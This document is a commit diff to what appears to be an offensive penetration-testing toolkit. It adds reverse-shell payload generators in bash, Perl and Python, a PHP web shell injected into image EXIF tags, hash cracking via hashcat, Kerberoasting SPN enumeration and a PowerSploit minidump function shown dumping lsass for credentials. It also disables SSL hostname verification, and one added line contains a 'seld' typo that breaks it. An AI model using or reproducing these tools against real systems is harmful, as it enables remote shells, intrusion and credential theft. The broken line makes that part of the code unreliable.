Windows Binaries + MSSQL hash type

crack_hash.py

@@ -63,6 +63,7 @@ class HashType(enum.Enum):
     # Windows
     LM   = 3000
     NTLM = 1000
+    MSSQL = 1731
 
     # Kerberos
     KERBEROS_AS_REQ = 7500
@@ -163,6 +164,9 @@ class Hash:
                     self.type.append(HashType.RAW_SHA2_512)
                     self.type.append(HashType.RAW_SHA3_512)
                     self.type.append(HashType.RAW_KECCAK_256)
+            elif hash_len == 140:
+                if not self.isSalted:
+                    seld.type.append(HashType.MSSQL)
 
         if len(self.type) == 0:
             print("%s: Unknown hash" % self.hash)
@@ -216,6 +220,6 @@ if len(uncracked_hashes) > 0:
         fp.write(b"%s\n" % hash.hash.encode("UTF-8"))
     fp.flush()
 
-    proc = subprocess.Popen(["hashcat", "-m", str(selected_type.value), "-a", "0", fp.name, wordlist, "--force"])
+    proc = subprocess.Popen(["hashcat", "-m", str(selected_type.value), "-a", "0", fp.name, wordlist])
     proc.wait()
     fp.close()

genRevShell.py

@@ -10,7 +10,8 @@ def generatePayload(type, local_address, port):
     if type == "bash":
         return "bash -i >& /dev/tcp/%s/%d 0>&1" % (local_address, port)
     elif type == "perl":
-        return "perl -e 'use Socket;$i=\"%s\";$p=%d;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/bash -i\");};'" % (local_address, port)
+        return "perl -e 'use Socket;$i=\"%s\";$p=%d;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/bash -i\");};'\n" \
+        "perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,\"%s:%d\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'" % (local_address, port, local_address, port)
     elif type == "python" or type == "python2" or type == "python3":
         binary = type
         return "%s -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%d));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'" % (binary, local_address, port)

padBuster.pl

@@ -637,6 +637,7 @@ sub makeRequest {
  do {
   #Quick hack to avoid hostname in URL when using a proxy with SSL (this will get re-set later if needed)
   $ENV{HTTPS_PROXY} = "";
+  $ENV{PERL_LWP_SSL_VERIFY_HOSTNAME} = 0;
 
   $lwp = LWP::UserAgent->new(env_proxy => 1,
                             keep_alive => 1,
@@ -886,4 +887,3 @@ sub getTime {
   return $hour.":".$minute.":".$second;
  }
 }
-

util.py

@@ -118,20 +118,28 @@ def exifImage(payload="<?php system($_GET['c']);?>", _in=None, _out=None, exif_t
         print("Invalid input. Either give an Image or a path to an image.")
         return
 
+    valid_tags = list(exif._constants.ATTRIBUTE_NAME_MAP.values())
     if exif_tag is None:
         exif_tag = "image_description"
+    elif exif_tag == "all":
+        for exif_tag in valid_tags:
+            try:
+                _in[exif_tag] = payload
+                print("adding:", exif_tag)
+            except Exception as e:
+                pass
     else:
-        valid_tags = dir(_in)
-
         if exif_tag not in valid_tags:
             print("Invalid exif-tag. Choose one of the following:")
             print(", ".join(valid_tags))
             return
 
-    _in[exif_tag] = payload
+        _in[exif_tag] = payload
+
     if _out is None:
         sys.stdout.write(_in.get_file())
         sys.stdout.flush()
+
     elif isinstance(_out, str):
         with open(_out, "wb") as f:
             f.write(_in.get_file())

win/GetUserSPNs.ps1

@@ -0,0 +1,129 @@
+# Edits by Tim Medin
+# File:     GetUserSPNS.ps1
+# Contents: Query the domain to find SPNs that use User accounts
+# Comments: This is for use with Kerberoast https://github.com/nidem/kerberoast
+#           The password hash used with Computer accounts are infeasible to 
+#           crack; however, if the User account associated with an SPN may have
+#           a crackable password. This tool will find those accounts. You do not
+#           need any special local or domain permissions to run this script. 
+#           This script on a script supplied by Microsoft (details below).
+# History:  2016/07/07     Tim Medin    Add -UniqueAccounts parameter to only get unique SAMAccountNames
+#           2016/04/12     Tim Medin    Added -Request option to automatically get the tickets
+#           2014/11/12     Tim Medin    Created
+
+[CmdletBinding()]
+Param(
+  [Parameter(Mandatory=$False,Position=1)] [string]$GCName,
+  [Parameter(Mandatory=$False)] [string]$Filter,
+  [Parameter(Mandatory=$False)] [switch]$Request,
+  [Parameter(Mandatory=$False)] [switch]$UniqueAccounts
+)
+
+Add-Type -AssemblyName System.IdentityModel
+
+$GCs = @()
+
+If ($GCName) {
+  $GCs += $GCName
+} else { # find them
+  $ForestInfo = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
+  $CurrentGCs = $ForestInfo.FindAllGlobalCatalogs()
+  ForEach ($GC in $CurrentGCs) {
+    #$GCs += $GC.Name
+    $GCs += $ForestInfo.ApplicationPartitions[0].SecurityReferenceDomain
+  }
+}
+
+if (-not $GCs) {
+  # no Global Catalogs Found
+  Write-Host "No Global Catalogs Found!"
+  Exit
+}
+
+<#
+Things you can extract
+Name                           Value
+----                           -----
+admincount                     {1}
+samaccountname                 {sqlengine}
+useraccountcontrol             {66048}
+primarygroupid                 {513}
+userprincipalname              {sqlengine@medin.local}
+instancetype                   {4}
+displayname                    {sqlengine}
+pwdlastset                     {130410454241766739}
+memberof                       {CN=Domain Admins,CN=Users,DC=medin,DC=local}
+samaccounttype                 {805306368}
+serviceprincipalname           {MSSQLSvc/sql01.medin.local:1433, MSSQLSvc/sql01.medin.local}
+usnchanged                     {135252}
+lastlogon                      {130563243107145358}
+accountexpires                 {9223372036854775807}
+logoncount                     {34}
+adspath                        {LDAP://CN=sqlengine,CN=Users,DC=medin,DC=local}
+distinguishedname              {CN=sqlengine,CN=Users,DC=medin,DC=local}
+badpwdcount                    {0}
+codepage                       {0}
+name                           {sqlengine}
+whenchanged                    {9/22/2014 6:45:21 AM}
+badpasswordtime                {0}
+dscorepropagationdata          {4/4/2014 2:16:44 AM, 4/4/2014 12:58:27 AM, 4/4/2014 12:37:04 AM,...
+lastlogontimestamp             {130558419213902030}
+lastlogoff                     {0}
+objectclass                    {top, person, organizationalPerson, user}
+countrycode                    {0}
+cn                             {sqlengine}
+whencreated                    {4/4/2014 12:37:04 AM}
+objectsid                      {1 5 0 0 0 0 0 5 21 0 0 0 191 250 179 30 180 59 104 26 248 205 17...
+objectguid                     {101 165 206 61 61 201 88 69 132 246 108 227 231 47 109 102}
+objectcategory                 {CN=Person,CN=Schema,CN=Configuration,DC=medin,DC=local}
+usncreated                     {57551}
+#>
+
+ForEach ($GC in $GCs) {
+    $searcher = New-Object System.DirectoryServices.DirectorySearcher
+    $searcher.SearchRoot = "LDAP://" + $GC
+    $searcher.PageSize = 1000
+    $searcher.Filter = "(&(!objectClass=computer)(servicePrincipalName=*))"
+    $searcher.PropertiesToLoad.Add("serviceprincipalname") | Out-Null
+    $searcher.PropertiesToLoad.Add("name") | Out-Null
+    $searcher.PropertiesToLoad.Add("samaccountname") | Out-Null
+    #$searcher.PropertiesToLoad.Add("userprincipalname") | Out-Null
+    #$searcher.PropertiesToLoad.Add("displayname") | Out-Null
+    $searcher.PropertiesToLoad.Add("memberof") | Out-Null
+    $searcher.PropertiesToLoad.Add("pwdlastset") | Out-Null
+    #$searcher.PropertiesToLoad.Add("distinguishedname") | Out-Null
+
+    $searcher.SearchScope = "Subtree"
+
+    $results = $searcher.FindAll()
+    
+    [System.Collections.ArrayList]$accounts = @()
+        
+    foreach ($result in $results) {
+        foreach ($spn in $result.Properties["serviceprincipalname"]) {
+            $o = Select-Object -InputObject $result -Property `
+                @{Name="ServicePrincipalName"; Expression={$spn.ToString()} }, `
+                @{Name="Name";                 Expression={$result.Properties["name"][0].ToString()} }, `
+                #@{Name="UserPrincipalName";   Expression={$result.Properties["userprincipalname"][0].ToString()} }, `
+                @{Name="SAMAccountName";       Expression={$result.Properties["samaccountname"][0].ToString()} }, `
+                #@{Name="DisplayName";         Expression={$result.Properties["displayname"][0].ToString()} }, `
+                @{Name="MemberOf";             Expression={$result.Properties["memberof"][0].ToString()} }, `
+                @{Name="PasswordLastSet";      Expression={[datetime]::fromFileTime($result.Properties["pwdlastset"][0])} } #, `
+                #@{Name="DistinguishedName";   Expression={$result.Properties["distinguishedname"][0].ToString()} }
+            if ($UniqueAccounts) {
+                if (-not $accounts.Contains($result.Properties["samaccountname"][0].ToString())) {
+                    $accounts.Add($result.Properties["samaccountname"][0].ToString()) | Out-Null
+                    $o
+                    if ($Request) {
+                        New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $spn.ToString() | Out-Null
+                    }
+                }
+            } else {
+                $o
+                if ($Request) {
+                    New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $spn.ToString() | Out-Null
+                }
+            }
+        }
+    }
+}

win/Out-Minidump.ps1

@@ -0,0 +1,130 @@
+function Out-Minidump
+{
+<#
+.SYNOPSIS
+
+    Generates a full-memory minidump of a process.
+
+    PowerSploit Function: Out-Minidump
+    Author: Matthew Graeber (@mattifestation)
+    License: BSD 3-Clause
+    Required Dependencies: None
+    Optional Dependencies: None
+
+.DESCRIPTION
+
+    Out-Minidump writes a process dump file with all process memory to disk.
+    This is similar to running procdump.exe with the '-ma' switch.
+
+.PARAMETER Process
+
+    Specifies the process for which a dump will be generated. The process object
+    is obtained with Get-Process.
+
+.PARAMETER DumpFilePath
+
+    Specifies the path where dump files will be written. By default, dump files
+    are written to the current working directory. Dump file names take following
+    form: processname_id.dmp
+
+.EXAMPLE
+
+    Out-Minidump -Process (Get-Process -Id 4293)
+
+    Description
+    -----------
+    Generate a minidump for process ID 4293.
+
+.EXAMPLE
+
+    Get-Process lsass | Out-Minidump
+
+    Description
+    -----------
+    Generate a minidump for the lsass process. Note: To dump lsass, you must be
+    running from an elevated prompt.
+
+.EXAMPLE
+
+    Get-Process | Out-Minidump -DumpFilePath C:\temp
+
+    Description
+    -----------
+    Generate a minidump of all running processes and save them to C:\temp.
+
+.INPUTS
+
+    System.Diagnostics.Process
+
+    You can pipe a process object to Out-Minidump.
+
+.OUTPUTS
+
+    System.IO.FileInfo
+
+.LINK
+
+    http://www.exploit-monday.com/
+#>
+
+    [CmdletBinding()]
+    Param (
+        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)]
+        [System.Diagnostics.Process]
+        $Process,
+
+        [Parameter(Position = 1)]
+        [ValidateScript({ Test-Path $_ })]
+        [String]
+        $DumpFilePath = $PWD
+    )
+
+    BEGIN
+    {
+        $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')
+        $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')
+        $Flags = [Reflection.BindingFlags] 'NonPublic, Static'
+        $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)
+        $MiniDumpWithFullMemory = [UInt32] 2
+    }
+
+    PROCESS
+    {
+        $ProcessId = $Process.Id
+        $ProcessName = $Process.Name
+        $ProcessHandle = $Process.Handle
+        $ProcessFileName = "$($ProcessName)_$($ProcessId).dmp"
+
+        $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName
+
+        $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)
+
+        $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,
+                                                     $ProcessId,
+                                                     $FileStream.SafeFileHandle,
+                                                     $MiniDumpWithFullMemory,
+                                                     [IntPtr]::Zero,
+                                                     [IntPtr]::Zero,
+                                                     [IntPtr]::Zero))
+
+        $FileStream.Close()
+
+        if (-not $Result)
+        {
+            $Exception = New-Object ComponentModel.Win32Exception
+            $ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))"
+
+            # Remove any partially written dump files. For example, a partial dump will be written
+            # in the case when 32-bit PowerShell tries to dump a 64-bit process.
+            Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue
+
+            throw $ExceptionMessage
+        }
+        else
+        {
+            Get-ChildItem $ProcessDumpPath
+        }
+    }
+
+    END {}
+}